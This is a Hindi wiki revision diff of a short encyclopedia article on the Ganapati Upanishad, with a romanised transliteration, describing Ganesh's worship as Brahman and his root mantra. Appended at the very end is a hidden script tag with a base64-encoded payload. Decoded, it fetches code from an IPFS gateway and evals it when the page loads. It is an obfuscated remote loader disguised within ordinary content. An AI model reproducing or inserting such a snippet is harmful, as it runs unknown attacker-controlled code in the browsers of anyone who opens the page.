Difference between revisions of "गणपति उपनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
*अथर्ववेदीय इस उपनिषद में गणपति की ब्रह्म-रूप में उपासना की गयी है।
+
*[[अथर्ववेद|अथर्ववेदीय]] इस उपनिषद में गणपति अथवा [[गणेश]] की ब्रह्म-रूप में उपासना की गयी है।
 
*गणपति को वाणी का देवता माना गया है।  
 
*गणपति को वाणी का देवता माना गया है।  
 
*उन्हें तीन गुणों-सत, रज, तम- से परे माना गया है।  
 
*उन्हें तीन गुणों-सत, रज, तम- से परे माना गया है।  
Line 6: Line 6:
 
*समस्त शुभकर्मों में सबसे पहले गणपति की उपासना का विधान है।  
 
*समस्त शुभकर्मों में सबसे पहले गणपति की उपासना का विधान है।  
 
*गणपति की उपासना से सभी सकंट कट जाते हैं और मनोवांछित फल की प्राप्ति होती है।  
 
*गणपति की उपासना से सभी सकंट कट जाते हैं और मनोवांछित फल की प्राप्ति होती है।  
<br />
 
  
 
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Revision as of 19:06, 29 September 2011

  • atharvavediy is upanishad mean ganapati athava ganesh ki brahm-roop mean upasana ki gayi hai.
  • ganapati ko vani ka devata mana gaya hai.
  • unhean tin gunoan-sat, raj, tam- se pare mana gaya hai.
  • ganapati manushy ke mooladhar chakr mean sthit rahate haian. ichchha, kriya aur jnan adi shaktiyoan ke ve ekamatr adhar haian. yogi sadaiv ganapati ki aradhana karate haian.
  • ganapati ki upasana ka bij mantr 'Omgamh' (Om ganapate nam:) hai. ise mahamantr ke nam se jana jata haian ganesh ji ki ekadant, vakratund aur gajanan nam se pooja ki jati hai.
  • samast shubhakarmoan mean sabase pahale ganapati ki upasana ka vidhan hai.
  • ganapati ki upasana se sabhi sakant kat jate haian aur manovaanchhit phal ki prapti hoti hai.


sanbandhit lekh

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>